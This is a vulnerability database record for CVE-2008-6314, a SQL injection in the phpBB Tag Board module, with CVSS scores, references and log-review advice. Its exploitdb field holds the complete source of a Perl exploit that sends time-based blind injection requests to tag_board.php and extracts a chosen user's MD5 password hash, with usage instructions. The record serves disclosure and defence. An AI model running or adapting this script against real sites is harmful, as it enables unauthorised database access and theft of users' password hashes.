ID CVE-2008-6314
Type cve
Reporter cve@mitre.org
Modified 2017-09-29T01:33:00
Description
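SQL injection vulnerability in tag_board.php in the Tag Board module 4.0 and earlier for phpBB allows remote attackers to execute arbitrary SQL commands via the id parameter in a delete action. The record below classifies the flaw as CWE-89 with a CVSS v2 base score of 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), i.e. reachable over the network without authentication, and it references a public exploit (EDB-ID:7386). The record names no fixed release, so operators should first confirm whether the module is installed; in web server logs, requests to tag_board.php with a delete action whose id value is anything other than the expected (presumably numeric) identifier deserve review.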
{"id": "CVE-2008-6314", "bulletinFamily": "NVD", "title": "CVE-2008-6314", "description": "SQL injection vulnerability in tag_board.php in the Tag Board module 4.0 and earlier for phpBB allows remote attackers to execute arbitrary SQL commands via the id parameter in a delete action.", "published": "2009-02-27T11:30:00", "modified": "2017-09-29T01:33:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6314", "reporter": "cve@mitre.org", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/47163", "http://secunia.com/advisories/33031", "https://www.exploit-db.com/exploits/7386", "http://www.securityfocus.com/bid/32701", "http://osvdb.org/50600"], "cvelist": ["CVE-2008-6314"], "type": "cve", "lastseen": "2021-02-02T05:35:20", "edition": 6, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:7386"]}], "modified": "2021-02-02T05:35:20", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-02-02T05:35:20", "rev": 2}, "vulnersScore": 7.2}, "cpe": ["cpe:/a:phpbb:tag_board:4.0"], "affectedSoftware": [{"cpeName": "phpbb:tag_board", "name": "phpbb tag board", "operator": "le", "version": "4.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:phpbb:tag_board:4.0:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "scheme": null, "affectedConfiguration": [{"cpeName": "phpbb:phpbb", "name": "phpbb", "operator": "eq", "version": "*"}], "cpeConfiguration": 
{"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:phpbb:phpbb:*:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:a:phpbb:tag_board:4.0:*:*:*:*:*:*:*", "versionEndIncluding": "4.0", "vulnerable": true}], "operator": "OR"}], "operator": "AND"}]}, "extraReferences": [{"name": "tagboard-tagboard-sql-injection(47163)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/47163"}, {"name": "32701", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/32701"}, {"name": "33031", "refsource": "SECUNIA", "tags": ["Vendor Advisory"], "url": "http://secunia.com/advisories/33031"}, {"name": "7386", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/7386"}, {"name": "50600", "refsource": "OSVDB", "tags": [], "url": "http://osvdb.org/50600"}]}
{"exploitdb": [{"lastseen": "2016-02-01T03:06:11", "description": "phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit. CVE-2008-6314. Webapps exploit for php platform", "published": "2008-12-08T00:00:00", "type": "exploitdb", "title": "phpBB 3 Mod Tag Board <= 4 Remote Blind SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6314"], "modified": "2008-12-08T00:00:00", "id": "EDB-ID:7386", "href": "https://www.exploit-db.com/exploits/7386/", "sourceData": "#!/usr/bin/perl \n# ---------------------------------------------------------------\n# phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit \n# by athos - staker[at]hotmail[dot]it\n# http://bx67212.netsons.org/forum/viewforum.php?f=3\n# ---------------------------------------------------------------\n# Note: Works regardless PHP.ini settings!\n# Thanks meh also know as cHoBi\n# ---------------------------------------------------------------\n\nuse strict;\nuse LWP::UserAgent;\n\nmy ($hash,$time1,$time2);\n\nmy @chars = (48..57, 97..102); \nmy $http = new LWP::UserAgent;\n\nmy $host = shift;\nmy $table = shift;\nmy $myid = shift or &usage;\n\n\nsub injection\n{\n my ($sub,$char) = @_;\n \n return \"/tag_board.php?mode=controlpanel&action=delete&id=\".\n \"1+and+(select+if((ascii(substring(user_password,${sub},1)\".\n \")=${char}),benchmark(230000000,char(0)),0)+from+${table}_us\".\n \"ers+where+user_id=${myid})--\";\n}\n\n\nsub usage\n{\n print STDOUT \"Usage: perl $0 [host] [table_prefix] [user_id]\\n\";\n print STDOUT \"Howto: perl $0 http://localhost/phpBB phpbb 2\\n\";\n print STDOUT \"by athos - staker[at]hotmail[dot]it\\n\";\n exit;\n}\n\n\nsyswrite(STDOUT,'Hash MD5: ');\n\nfor my $i(1..33)\n{\n for my $j(0..16)\n {\n $time1 = time();\n\n $http->get($host.injection($i,$chars[$j]));\n \n $time2 = time();\n\n if($time2 - $time1 > 6)\n {\n syswrite(STDOUT,chr($chars[$j]));\n $hash .= chr($chars[$j]); \n last;\n }\n \n if($i == 1 && length $hash < 0)\n {\n 
syswrite(STDOUT,\"Exploit Failed!\\n\");\n exit;\n } \n }\n}\n\n# milw0rm.com [2008-12-08]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7386/"}]}